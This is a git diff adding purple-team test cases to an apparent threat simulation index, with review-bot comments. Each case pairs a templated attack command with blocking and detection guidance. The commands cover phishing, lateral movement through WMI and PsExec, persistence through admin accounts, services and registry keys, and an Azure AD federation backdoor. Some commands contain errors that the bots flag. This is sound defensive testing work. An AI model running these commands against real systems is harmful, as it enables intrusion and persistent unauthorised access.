@@ -0,0 +1,17 @@ +name: Suspicious external employee login +description: Login to an external employee portal from an unexpected geolocation and with an unexpected user-agent to simulate a suspicious login attempt. +platforms: +guidance: +block: +- Suspicious logins originating from select geolocations are blocked +detect: +- Baseline login events for users using authentication logs then generate alerts for instances where the logins occur from comparatively anomalous geolocations +controls: +- SIEM +- IdP +metadata: + id: 609515fe-24e0-4bc2-a069-a3d815e68ec2 + tid: T1078 + tactic: TA0001 + x_vectr_id: 609515fe-24e0-4bc2-a069-a3d815e68ec2 + isv: 1 diff --git a/h-index-2024/techniques/InitialAccess/98551e7e-1cb8-47c0-a27d-772ddd700617.yml b/h-index-2024/techniques/InitialAccess/98551e7e-1cb8-47c0-a27d-772ddd700617.yml new file mode 100644 index 0000000..c65d238 --- /dev/null +++ b/h-index-2024/techniques/InitialAccess/98551e7e-1cb8-47c0-a27d-772ddd700617.yml @@ -0,0 +1,17 @@ +name: Link - Zipped DLL via sharing +description: Send a link to a zipped DLL payload stored on a cloud storage service like Google Drive by using the sharing features of that service +platforms: +guidance: +- ps> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ from }} -Attachments {{ attachment }} +block: +- Malicious email blocked/quarantined or link inside email rewritten/stripped by email gateway +detect: +- Malicious email alerted on by email gateway +controls: +- Mail Gateway +metadata: + id: 98551e7e-1cb8-47c0-a27d-772ddd700617 + tid: T1566.002 + tactic: TA0001 + x_vectr_id: 98551e7e-1cb8-47c0-a27d-772ddd700617 + isv: 1 diff --git a/h-index-2024/techniques/InitialAccess/ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml b/h-index-2024/techniques/InitialAccess/ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml new file mode 100644 index 0000000..daf292b --- /dev/null 
+++ b/h-index-2024/techniques/InitialAccess/ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7.yml @@ -0,0 +1,16 @@ +name: Prompt a user with multiple MFA requests +description: Using valid credentials for a user, prompt that user with multiple MFA requests in a short period of time in order to induce them to accept the prompt. +platforms: +guidance: +block: +- Prevent sign-ins from users with anomalous login characteristics, such as an unknown geolocation or device fingerprint +detect: +- Baseline MFA requests for users using authentication logs then generate alerts for instances where the amount of MFA requests for a user significantly exceeds the baseline within a short time period (e.g. <1 hour). +controls: +- IdP +metadata: + id: ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7 + tid: T1621 + tactic: TA0006 + x_vectr_id: ba6b3115-f8f6-4b28-bb24-ad5dfad6b4b7 + isv: 1 diff --git a/h-index-2024/techniques/InitialAccess/ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml b/h-index-2024/techniques/InitialAccess/ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml new file mode 100644 index 0000000..1eae23d --- /dev/null +++ b/h-index-2024/techniques/InitialAccess/ccf6d4a6-879e-4a7c-a2ae-6273437fc658.yml @@ -0,0 +1,17 @@ +name: Attachment - ISO +description: Send phishing email to victim containing an ISO attachment. ISO files can be used to bypass mark-of-the-web restrictions. +platforms: +guidance: +- PS> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ noreply@maildomain }} -Attachments {{ attachment }} +block: +- Malicious email blocked/quarantined or link inside email rewritten/stripped by email gateway +detect: +- Malicious email alerted on by email gateway +controls: +- Mail Gateway +metadata: + id: ccf6d4a6-879e-4a7c-a2ae-6273437fc658 + tid: T1566.001 + tactic: TA0001 + x_vectr_id: ccf6d4a6-879e-4a7c-a2ae-6273437fc658 + isv: 1 
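Review bot: The block entry describes anomalous-sign-in prevention, which is a control against the preceding credential use rather than against the MFA-prompt flood itself; the control that directly defeats this test is requiring number matching or equivalent challenge-response in the push authenticator, so a second entry such as `- Require number matching / additional context in push MFA so that a blind 'Approve' cannot satisfy the prompt` would let the case score the right control. The detect entry would be clearer if it named the metric, e.g. count of denied or unanswered MFA pushes per user per window, rather than "amount of MFA requests". The file is also placed under InitialAccess while `tactic` is TA0006 (Credential Access), which matches ATT&CK's placement of T1621; if the directory is used for grouping, one of the two should change.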
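Review bot: The block entry in the ISO case reads `link inside email rewritten/stripped`, but this test sends an attachment, so the text appears copied from the link variant; it should read `- Malicious email blocked/quarantined or attachment inside email stripped by email gateway`, as the "Attachment - Macro" case does. The `-From {{ noreply@maildomain }}` placeholder also differs from the `{{ from }}` variable used by the other phishing cases in this commit, which will break a templater that expects a bare variable name inside the braces. The description's mark-of-the-web claim is fine as context, but a block entry for that aspect (e.g. attachment-type policy that strips disk-image attachments) would give the case something beyond the generic gateway verdict to score.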
diff --git a/h-index-2024/techniques/LateralMovement/0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml b/h-index-2024/techniques/LateralMovement/0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml new file mode 100644 index 0000000..775b96d --- /dev/null +++ b/h-index-2024/techniques/LateralMovement/0735ef7e-438f-4fc9-a656-7d11d73fbc61.yml @@ -0,0 +1,20 @@ +name: Lateral Movement via RDP +description: Perform an interactive logons to a Windows system via RDP +platforms: +- windows +guidance: +- CMD> mstsc /v:{{ target }} +block: +- Host-based firewalls prevent direct communications over common ports/protocols +detect: +- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal +controls: +- SIEM +- Identity Threat Protection +- Hardening +metadata: + id: 0735ef7e-438f-4fc9-a656-7d11d73fbc61 + tid: T1021.001 + tactic: TA0008 + x_vectr_id: 0735ef7e-438f-4fc9-a656-7d11d73fbc61 + isv: 1 diff --git a/h-index-2024/techniques/LateralMovement/3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml b/h-index-2024/techniques/LateralMovement/3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml new file mode 100644 index 0000000..807596c --- /dev/null +++ b/h-index-2024/techniques/LateralMovement/3c337f53-d086-4f2f-818a-08fb1a1c5f79.yml 
@@ -0,0 +1,23 @@ +name: Lateral Movement via WMI +description: Move to another system by using Windows Management Instrumentation (WMI) to spawn a process on that target system +platforms: +- windows +guidance: +- CMD> wmic /node:"{{ target }}" process call create "{{ command }}" +block: +- Suspicious process execution/behavior blocked by endpoint security tool +- Host-based firewalls prevent direct communications over common ports/protocols +detect: +- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry +- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal +controls: +- Endpoint Protection +- SIEM +- Identity Threat Protection +- Hardening +metadata: + id: 3c337f53-d086-4f2f-818a-08fb1a1c5f79 + tid: T1021.003 + tactic: TA0008 + x_vectr_id: 3c337f53-d086-4f2f-818a-08fb1a1c5f79 + isv: 1 diff --git a/h-index-2024/techniques/LateralMovement/9b5396f2-6e4a-498a-995e-47e48a99bf76.yml b/h-index-2024/techniques/LateralMovement/9b5396f2-6e4a-498a-995e-47e48a99bf76.yml new file mode 100644 index 0000000..508dc52 --- /dev/null +++ b/h-index-2024/techniques/LateralMovement/9b5396f2-6e4a-498a-995e-47e48a99bf76.yml 
@@ -0,0 +1,24 @@ +name: Lateral Movement via PsExec +description: Move to another system by creating a service remotely via Sysinternals PsExec +platforms: +- windows +guidance: +- CMD> psexec -s \{{ target }} {{ command }} +block: +- Suspicious process execution/behavior blocked by endpoint security tool +- Host-based firewalls prevent direct communications over common ports/protocols +- Remote access to the service control manager is blocked by a DACL, preventing service creation by remote users +detect: +- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry +- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal +controls: +- Endpoint Protection +- SIEM +- Identity Threat Protection +- Hardening +metadata: + id: 9b5396f2-6e4a-498a-995e-47e48a99bf76 + tid: T1021.002 + tactic: TA0008 + x_vectr_id: 9b5396f2-6e4a-498a-995e-47e48a99bf76 + isv: 1 diff --git a/h-index-2024/techniques/LateralMovement/b74ff4c5-eebf-466b-af85-341b19c4c748.yml b/h-index-2024/techniques/LateralMovement/b74ff4c5-eebf-466b-af85-341b19c4c748.yml new file mode 100644 index 0000000..c373b4f --- /dev/null +++ b/h-index-2024/techniques/LateralMovement/b74ff4c5-eebf-466b-af85-341b19c4c748.yml 
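Review bot: The guidance line `psexec -s \{{ target }} {{ command }}` has a single backslash before the host placeholder, whereas a UNC host needs two and the "Remote .exe copy" case in the next hunk correctly writes `\\{{ target }}`; as written the target argument is malformed. Suggest `- CMD> psexec -s \\{{ target }} {{ command }}`. The detect list could also name the service-installation event that this technique characteristically produces (the same Event ID 4697 the "Persist via new Windows service" case cites), since that is the highest-fidelity signal for PsExec-style execution.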
@@ -0,0 +1,20 @@ +name: Remote .exe copy +description: Copy an .exe payload to a temp folder on the remote target +platforms: +guidance: +- cmd> copy {{ exe }} \\{{ target }}\{{ share }}\{{ path }} +block: +- Host-based firewalls prevent direct communications over common ports/protocols +detect: +- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry +- Anomalous remote access patterns detected by UEBA/UEBA-like tool and/or in the SIEM using telemetry, such as Windows authentication events (Event ID 4624, 4648), as compared to a baseline of remote access activities for the initiating principal +controls: +- Endpoint Protection +- Antivirus +- SIEM +metadata: + id: b74ff4c5-eebf-466b-af85-341b19c4c748 + tid: T1570 + tactic: TA0008 + x_vectr_id: b74ff4c5-eebf-466b-af85-341b19c4c748 + isv: 1 diff --git a/h-index-2024/techniques/Persistence/05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml b/h-index-2024/techniques/Persistence/05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml new file mode 100644 index 0000000..a58486f --- /dev/null +++ b/h-index-2024/techniques/Persistence/05d0ccbf-9f9f-4046-b5f0-09c149623f96.yml 
@@ -0,0 +1,23 @@ +name: Register a new device in Azure AD +description: Register a new device in Azure AD +platforms: +- azuread +guidance: +- PS> Join-AADIntDeviceToAurzeAD -DeviceName {{ name }} -DeviceType "purple" -OSVersion "1" +block: +- 'Prevent users outside of approved groups from being able to register new devices in the tenant. Refer to documentation for details: https://learn.microsoft.com/en-us/azure/active-directory/devices/device-management-azure-portal#configure-device-settings' +detect: +- Detect anomalous device registration events by using Azure audit logs +controls: +- SIEM +- Hardening +metadata: + id: 05d0ccbf-9f9f-4046-b5f0-09c149623f96 + tid: T1098.005 + tactic: TA0003 + x_tools: + - AADInternals + x_references: + - htpts://aadinternals.nom/post/prt/ + x_vectr_id: 05d0ccbf-9f9f-4046-b5f0-09c149623f96 + isv: 1 diff --git a/h-index-2024/techniques/Persistence/0bcb2080-b140-4a1c-9e79-8512a18882d8.yml b/h-index-2024/techniques/Persistence/0bcb2080-b140-4a1c-9e79-8512a18882d8.yml new file mode 100644 index 0000000..6a86c5e --- /dev/null +++ b/h-index-2024/techniques/Persistence/0bcb2080-b140-4a1c-9e79-8512a18882d8.yml @@ -0,0 +1,21 @@ +name: Persist via new local administrator +description: Create a new local user then add them to the "Administrators" group using the builtin net.exe +platforms: +- windows +guidance: +- CMD> net user /add {{ username }} {{ password }} +- CMD> net localgroup administrators {{ username }} /add +block: +- Suspicious process execution/behavior blocked by endpoint security tool +detect: +- Suspicious process execution/behavior detected by endpoint security tool +- Use group modification events (Event ID 4728) to identify additions to local security groups. +controls: +- Endpoint Protection +- SIEM +metadata: + id: 0bcb2080-b140-4a1c-9e79-8512a18882d8 + tid: T1136.001 + tactic: TA0003 + x_vectr_id: 0bcb2080-b140-4a1c-9e79-8512a18882d8 + isv: 1 
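Review bot: The guidance cmdlet name `Join-AADIntDeviceToAurzeAD` looks like a transposition of AADInternals' `Join-AADIntDeviceToAzureAD`; as written the test step cannot run. The `x_references` entry `htpts://aadinternals.nom/post/prt/` is also malformed in both scheme and TLD and should be corrected to the intended address before release. The detect entry would be more actionable if it said which audit-log activity the SIEM rule keys on rather than "anomalous device registration events", and the description duplicates the name verbatim, so a sentence on why registration matters (a registered device can satisfy device-based conditional access) would make the case self-explanatory.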
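Review bot: The detect entry in the local-administrator case cites Event ID 4728, which Windows logs for additions to security-enabled global groups; the test adds to the local Administrators group, which produces Event ID 4732 (member added to a security-enabled local group), so a rule keyed on 4728 would miss this test. Suggest `- Use group modification events (Event ID 4732, security-enabled local group member added) to identify additions to local security groups.` The first step, `net user /add`, also produces Event ID 4720 (user account created), which is worth listing as an independent detection of the same test.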
diff --git a/h-index-2024/techniques/Persistence/20a6dace-d801-42f5-b659-6cf91e39d273.yml b/h-index-2024/techniques/Persistence/20a6dace-d801-42f5-b659-6cf91e39d273.yml new file mode 100644 index 0000000..cd00901 --- /dev/null +++ b/h-index-2024/techniques/Persistence/20a6dace-d801-42f5-b659-6cf91e39d273.yml @@ -0,0 +1,20 @@ +name: Persist via new scheduled task +description: Persist on a system by creating a new scheduled task +platforms: +- windows +guidance: +- cmd> schtasks.exe /create /sc daily /tn {{ task_name }} /tr {{ command }} /st 20:00 +block: +- Suspicious process execution/behavior blocked by endpoint security tool +detect: +- Suspicious process execution/behavior detected by endpoint security tool +- Use scheduled task creation events (Event ID 4698) to identify newly created scheduled tasks. Look specifically for events that are anomalous as compared to other task creation events in the environment, such as events where the command is unique across all other tasks and events created by principals that do not commonly create tasks. +controls: +- SIEM +- Endpoint Protection +metadata: + id: 20a6dace-d801-42f5-b659-6cf91e39d273 + tid: T1053.005 + tactic: TA0003 + x_vectr_id: 20a6dace-d801-42f5-b659-6cf91e39d273 + isv: 1 diff --git a/h-index-2024/techniques/Persistence/5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml b/h-index-2024/techniques/Persistence/5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml new file mode 100644 index 0000000..d43b8c9 --- /dev/null +++ b/h-index-2024/techniques/Persistence/5c24b470-4a3b-4de0-8adf-3d63bc8d5737.yml 
@@ -0,0 +1,20 @@ +name: Persist via new Windows service +description: Persist on a system by creating a new service +platforms: +- windows +guidance: +- CMD> sc create {{ service_name }} binPath= "{{ command }}" +block: +- Suspicious process execution/behavior blocked by endpoint security tool +detect: +- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry +- Use services creation events (Event ID 4697) to identify newly created services. Look specifically for events that are anomalous as compared to other service creation events in the environment, such as events where the command is unique across all other services and events created by principals that do not commonly create services. +controls: +- SIEM +- Endpoint Protection +metadata: + id: 5c24b470-4a3b-4de0-8adf-3d63bc8d5737 + tid: T1543.003 + tactic: TA0003 + x_vectr_id: 5c24b470-4a3b-4de0-8adf-3d63bc8d5737 + isv: 1 diff --git a/h-index-2024/techniques/Persistence/5dc3f424-8f31-49ee-a822-a77ce20bac43.yml b/h-index-2024/techniques/Persistence/5dc3f424-8f31-49ee-a822-a77ce20bac43.yml new file mode 100644 index 0000000..e7228e9 --- /dev/null +++ b/h-index-2024/techniques/Persistence/5dc3f424-8f31-49ee-a822-a77ce20bac43.yml 
@@ -0,0 +1,20 @@ +name: Persist via Registry "Run" key +description: Run a payload during user login and startup by setting a registry run key +platforms: +- windows +guidance: +- CMD> reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "{{ key_name }}" /t REG_SZ /F /D "{{ command }}" +block: +- Suspicious process execution/behavior blocked by endpoint security tool +detect: +- Suspicious process execution/behavior detected by endpoint security tool +- Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656). +controls: +- Endpoint Protection +- SIEM +metadata: + id: 5dc3f424-8f31-49ee-a822-a77ce20bac43 + tid: T1547.001 + tactic: TA0003 + x_vectr_id: 5dc3f424-8f31-49ee-a822-a77ce20bac43 + isv: 1 diff --git a/h-index-2024/techniques/Persistence/ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml b/h-index-2024/techniques/Persistence/ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml new file mode 100644 index 0000000..a323aaa --- /dev/null +++ b/h-index-2024/techniques/Persistence/ab8bd5d9-b8cb-43e6-a632-03aef9e9a622.yml 
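Review bot: The Registry detect entry here, and the identical one in the Winlogon Shell case in the next hunk, has a grammar slip: `modification are made the Registry` should read `modifications are made to the Registry`. It also points at Event ID 4656, which is the handle-request event and fires on reads as well as writes; Event ID 4657 (registry value modified) is the event that records the actual change to the Run value and would give the SIEM rule a precise, low-noise trigger, so the entry should cite 4657 and mention 4656 only as the noisier fallback. The detect entry could additionally note that EDR/Sysmon registry-value-set telemetry covers the same change without requiring a SACL, since many environments never enable object-access auditing for the registry.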
@@ -0,0 +1,20 @@ +name: Persist via Registry Winlogon Shell +description: Run a payload during user login by setting a Registry Winlogon key +platforms: +- windows +guidance: +- CMD> reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /f "{{ command }}" +block: +- Suspicious process execution/behavior blocked by endpoint security tool +detect: +- Suspicious process execution/behavior detected by endpoint security tool +- Enable object logging for the Registry via Group Policy Advanced Audit then configure a SACL on the Registry either directly or via the global audit settings in Group Policy. Trigger an alert when modification are made the Registry using object access logs (Event ID 4656). +controls: +- Endpoint Protection +- SIEM +metadata: + id: ab8bd5d9-b8cb-43e6-a632-03aef9e9a622 + tid: T1547.004 + tactic: TA0003 + x_vectr_id: ab8bd5d9-b8cb-43e6-a632-03aef9e9a622 + isv: 1 diff --git a/h-index-2024/techniques/Persistence/b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml b/h-index-2024/techniques/Persistence/b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml new file mode 100644 index 0000000..0a122f8 --- /dev/null +++ b/h-index-2024/techniques/Persistence/b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1.yml 
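Review bot: The guidance line `reg add ... /v Shell /f "{{ command }}"` passes the value data without the `/d` switch, so reg.exe will reject the trailing argument; the Run-key case in the previous hunk uses `/t REG_SZ /F /D "{{ command }}"`, and this line should mirror it: `- CMD> reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "{{ command }}" /f`. Because this overwrites the machine-wide Shell value (explorer.exe by default), the guidance or a note should require the tester to record and restore the original value, otherwise the host will not load the desktop at the next logon. The `block` list could also reflect that HKLM\...\Winlogon is writable only by administrators, so "test runs without local admin" is itself a meaningful preventive outcome to score.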
@@ -0,0 +1,23 @@ +name: Configure a custom federated domain +description: Convert a custom domain in the Azure Active Directory tenant into a federated domain. This can be used for persistent access into the tenant. +platforms: +- azuread +guidance: +- PS> ConvertTo-AADIntBackdoor -AccessToken {{ access_token }} -DomainName "{{ domain }}" +block: +- '' +detect: +- Monitor for unusual domain federation via the SEIM. Examine AAD logs for actions that "Set domain authentication" to "federated". +- https://www.inversecos.com/2021/11/how-to-detect-azure-active-directory.html +controls: +- SIEM +metadata: + id: b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1 + tid: T1484.002 + tactic: TA0003 + x_tools: + - AADInternals + x_references: + - https://o365blog.com/post/aadbackdoor/ + x_vectr_id: b07b0ea7-24ed-49c2-bfc8-a6b14060a7c1 + isv: 1 diff --git a/indexes.json b/indexes.json index bbf591e..5d08156 100644 --- a/indexes.json +++ b/indexes.json @@ -1,8 +1,9 @@ { "indexes": { - "fs-index": "fs-index-2023/fs-index-2023-v1.2.yml", - "rh-index": "rh-index-2023/rh-index-2023-v1.2.yml", - "h-index": "h-index-2023/h-index-2023-v1.2.yml" + "fs-index": "fs-index-2024/fs-index-2024-v1.0.yml", + "rh-index": "rh-index-2024/rh-index-2024-v1.0.yml", + "h-index": "h-index-2024/h-index-2024-v1.0.yml", + "ot-index": "ot-index-2024/ot-index-2024-v1.0.yml" } } diff --git a/ot-index-2024/CHANGELOG.md b/ot-index-2024/CHANGELOG.md new file mode 100644 index 0000000..b5315fa --- /dev/null +++ b/ot-index-2024/CHANGELOG.md @@ -0,0 +1,4 @@ +# v1.0 (January 2024) + +- Initial release + diff --git a/ot-index-2024/REQUIREMENTS.md b/ot-index-2024/REQUIREMENTS.md new file mode 100644 index 0000000..09408ed --- /dev/null +++ b/ot-index-2024/REQUIREMENTS.md 
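Review bot: `SEIM` in the first detect entry is a typo for `SIEM`, and the second detect entry is a bare URL rather than a detection, so it belongs under `x_references` with the other link. The `block` list is empty even though converting a domain to federated requires a highly privileged directory role; listing `- Restrict the roles able to change domain authentication settings to a small, PIM/just-in-time-activated set` would give the case a preventive control to score, with the exact role set confirmed against current Microsoft documentation. Since the test replaces the tenant's authentication path for a real domain, the guidance should also require a dedicated test domain and a documented rollback (convert the domain back to managed) so the harness never leaves a production domain federated to the test signing key.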
@@ -0,0 +1,36 @@ +# Infrastructure + +- Mail server/relay to send emails +- Proxy/VPN +- Proxy/VPN in non-standard geolocation +- HTTP/S file hosting server +- Command-and-control server(s) with HTTPS and HTTP channels +- Accounts for : Cloud storage provider (exfil), remote assistance service (if applicable) +- Domain(s) and certificate(s) for infrastructure +- MQTT broker + +## Payloads + +|#|Test Case|Payload|Notes| +|---|---|---|---| +|1|Attachment - ISO|ISO|| +|2|Link - Zipped DLL via sharing|DLL in zip|| +|3|Attachment - Macro|Macro-enabled Office document|| +|4|Macro - Remote Template|Office document that loads remotely-hosted macro-enabled template|| +|5|Load known-abusable kernel driver|Windows driver|refer to notebook for example drivers + hashes| +|6|DLL execution using Rundll32|DLL|| +|7|Sideload a DLL into a legitimate application|DLL|can be shared with #6 as long as exported functions are as expected| +|8|Register Security Service Provider (SSP) in LSASS|SSP DLL|refer to notebook for instructions on creating DLL| +|9||Sensitive data|Use dlptest.com for sample data| + +# Tools/Scripts + +- Remote assistance tool such as TeamViewer, GoTo, or AnyConnect +- SharpHound : https://github.com/BloodHoundAD/SharpHound +- AADInternals : https://github.com/Gerenios/AADInternals +- Mimikatz : https://github.com/gentilkiwi/mimikatz +- Rubeus : https://github.com/GhostPack/Rubeus +- ProcDump : https://learn.microsoft.com/en-us/sysinternals/downloads/procdump +- Nanodump : https://github.com/fortra/nanodump +- SharpDPAPI : https://github.com/GhostPack/SharpDPAPI +- File encryptor : https://github.com/2XXE-SRA/payload_resources/tree/master/coldencryptor diff --git a/ot-index-2024/ot-index-2024-v1.0-layer.json b/ot-index-2024/ot-index-2024-v1.0-layer.json new file mode 100644 index 0000000..e3594f2 --- /dev/null +++ b/ot-index-2024/ot-index-2024-v1.0-layer.json 
@@ -0,0 +1,3184 @@ +{ + "description": "Operational Technology Threat Simulation Index 2024 v1.0", + "domain": "enterprise-attack", + "layout": { + "layout": "flat" + }, + "name": "Operational Technology Threat Simulation Index 2024 v1.0", + "selectSubtechniquesWithParent": false, + "selectTechniquesAcrossTactics": false, + "techniques": [ + { + "enabled": false, + "techniqueID": "T1001" + }, + { + "enabled": false, + "techniqueID": "T1001.001" + }, + { + "enabled": false, + "techniqueID": "T1001.002" + }, + { + "enabled": false, + "techniqueID": "T1001.003" + }, + { + "enabled": false, + "techniqueID": "T1002" + }, + { + "showSubtechniques": true, + "techniqueID": "T1003" + }, + { + "showSubtechniques": true, + "techniqueID": "T1003" + }, + { + "showSubtechniques": true, + "techniqueID": "T1003" + }, + { + "showSubtechniques": true, + "techniqueID": "T1003" + }, + { + "showSubtechniques": true, + "techniqueID": "T1003" + }, + { + "color": "#7a34eb", + "techniqueID": "T1003.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1003.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1003.001" + }, + { + "enabled": false, + "techniqueID": "T1003.002" + }, + { + "color": "#7a34eb", + "techniqueID": "T1003.003" + }, + { + "enabled": false, + "techniqueID": "T1003.004" + }, + { + "enabled": false, + "techniqueID": "T1003.005" + }, + { + "color": "#7a34eb", + "techniqueID": "T1003.006" + }, + { + "enabled": false, + "techniqueID": "T1003.007" + }, + { + "enabled": false, + "techniqueID": "T1003.008" + }, + { + "enabled": false, + "techniqueID": "T1004" + }, + { + "enabled": false, + "techniqueID": "T1005" + }, + { + "enabled": false, + "techniqueID": "T1006" + }, + { + "enabled": false, + "techniqueID": "T1007" + }, + { + "enabled": false, + "techniqueID": "T1008" + }, + { + "enabled": false, + "techniqueID": "T1009" + }, + { + "enabled": false, + "techniqueID": "T1010" + }, + { + "enabled": false, + "techniqueID": "T1011" + }, + { + "enabled": false, + 
"techniqueID": "T1011.001" + }, + { + "enabled": false, + "techniqueID": "T1012" + }, + { + "enabled": false, + "techniqueID": "T1013" + }, + { + "color": "#7a34eb", + "techniqueID": "T1014" + }, + { + "enabled": false, + "techniqueID": "T1015" + }, + { + "enabled": false, + "techniqueID": "T1016" + }, + { + "enabled": false, + "techniqueID": "T1016.001" + }, + { + "enabled": false, + "techniqueID": "T1016.002" + }, + { + "enabled": false, + "techniqueID": "T1017" + }, + { + "color": "#7a34eb", + "techniqueID": "T1018" + }, + { + "enabled": false, + "techniqueID": "T1019" + }, + { + "enabled": false, + "techniqueID": "T1020" + }, + { + "enabled": false, + "techniqueID": "T1020.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1021" + }, + { + "color": "#7a34eb", + "techniqueID": "T1021" + }, + { + "color": "#7a34eb", + "techniqueID": "T1021" + }, + { + "showSubtechniques": true, + "techniqueID": "T1021" + }, + { + "showSubtechniques": true, + "techniqueID": "T1021" + }, + { + "showSubtechniques": true, + "techniqueID": "T1021" + }, + { + "color": "#7a34eb", + "techniqueID": "T1021.001" + }, + { + "color": "#7a34eb", + "techniqueID": "T1021.002" + }, + { + "color": "#7a34eb", + "techniqueID": "T1021.003" + }, + { + "enabled": false, + "techniqueID": "T1021.004" + }, + { + "enabled": false, + "techniqueID": "T1021.005" + }, + { + "enabled": false, + "techniqueID": "T1021.006" + }, + { + "enabled": false, + "techniqueID": "T1021.007" + }, + { + "enabled": false, + "techniqueID": "T1021.008" + }, + { + "enabled": false, + "techniqueID": "T1022" + }, + { + "enabled": false, + "techniqueID": "T1023" + }, + { + "enabled": false, + "techniqueID": "T1024" + }, + { + "enabled": false, + "techniqueID": "T1025" + }, + { + "enabled": false, + "techniqueID": "T1026" + }, + { + "enabled": false, + "techniqueID": "T1027" + }, + { + "enabled": false, + "techniqueID": "T1027.001" + }, + { + "enabled": false, + "techniqueID": "T1027.002" + }, + { + "enabled": false, + 
"techniqueID": "T1027.003" + }, + { + "enabled": false, + "techniqueID": "T1027.004" + }, + { + "enabled": false, + "techniqueID": "T1027.005" + }, + { + "enabled": false, + "techniqueID": "T1027.006" + }, + { + "enabled": false, + "techniqueID": "T1027.007" + }, + { + "enabled": false, + "techniqueID": "T1027.008" + }, + { + "enabled": false, + "techniqueID": "T1027.009" + }, + { + "enabled": false, + "techniqueID": "T1027.010" + }, + { + "enabled": false, + "techniqueID": "T1027.011" + }, + { + "enabled": false, + "techniqueID": "T1027.012" + }, + { + "enabled": false, + "techniqueID": "T1028" + }, + { + "enabled": false, + "techniqueID": "T1029" + }, + { + "enabled": false, + "techniqueID": "T1030" + }, + { + "enabled": false, + "techniqueID": "T1031" + }, + { + "enabled": false, + "techniqueID": "T1032" + }, + { + "enabled": false, + "techniqueID": "T1033" + }, + { + "enabled": false, + "techniqueID": "T1034" + }, + { + "enabled": false, + "techniqueID": "T1035" + }, + { + "enabled": false, + "techniqueID": "T1036" + }, + { + "enabled": false, + "techniqueID": "T1036.001" + }, + { + "enabled": false, + "techniqueID": "T1036.002" + }, + { + "enabled": false, + "techniqueID": "T1036.003" + }, + { + "enabled": false, + "techniqueID": "T1036.004" + }, + { + "enabled": false, + "techniqueID": "T1036.005" + }, + { + "enabled": false, + "techniqueID": "T1036.006" + }, + { + "enabled": false, + "techniqueID": "T1036.007" + }, + { + "enabled": false, + "techniqueID": "T1036.008" + }, + { + "enabled": false, + "techniqueID": "T1036.009" + }, + { + "enabled": false, + "techniqueID": "T1037" + }, + { + "enabled": false, + "techniqueID": "T1037.001" + }, + { + "enabled": false, + "techniqueID": "T1037.002" + }, + { + "enabled": false, + "techniqueID": "T1037.003" + }, + { + "enabled": false, + "techniqueID": "T1037.004" + }, + { + "enabled": false, + "techniqueID": "T1037.005" + }, + { + "enabled": false, + "techniqueID": "T1038" + }, + { + "enabled": false, + 
"techniqueID": "T1039" + }, + { + "enabled": false, + "techniqueID": "T1040" + }, + { + "color": "#7a34eb", + "techniqueID": "T1041" + }, + { + "enabled": false, + "techniqueID": "T1042" + }, + { + "enabled": false, + "techniqueID": "T1043" + }, + { + "enabled": false, + "techniqueID": "T1044" + }, + { + "enabled": false, + "techniqueID": "T1045" + }, + { + "color": "#7a34eb", + "techniqueID": "T1046" + }, + { + "color": "#7a34eb", + "techniqueID": "T1046" + }, + { + "enabled": false, + "techniqueID": "T1047" + }, + { + "showSubtechniques": true, + "techniqueID": "T1048" + }, + { + "enabled": false, + "techniqueID": "T1048.001" + }, + { + "enabled": false, + "techniqueID": "T1048.002" + }, + { + "color": "#7a34eb", + "techniqueID": "T1048.003" + }, + { + "enabled": false, + "techniqueID": "T1049" + }, + { + "enabled": false, + "techniqueID": "T1050" + }, + { + "enabled": false, + "techniqueID": "T1051" + }, + { + "enabled": false, + "techniqueID": "T1052" + }, + { + "enabled": false, + "techniqueID": "T1052.001" + }, + { + "showSubtechniques": true, + "techniqueID": "T1053" + }, + { + "enabled": false, + "techniqueID": "T1053.001" + }, + { + "enabled": false, + "techniqueID": "T1053.002" + }, + { + "enabled": false, + "techniqueID": "T1053.003" + }, + { + "enabled": false, + "techniqueID": "T1053.004" + }, + { + "color": "#7a34eb", + "techniqueID": 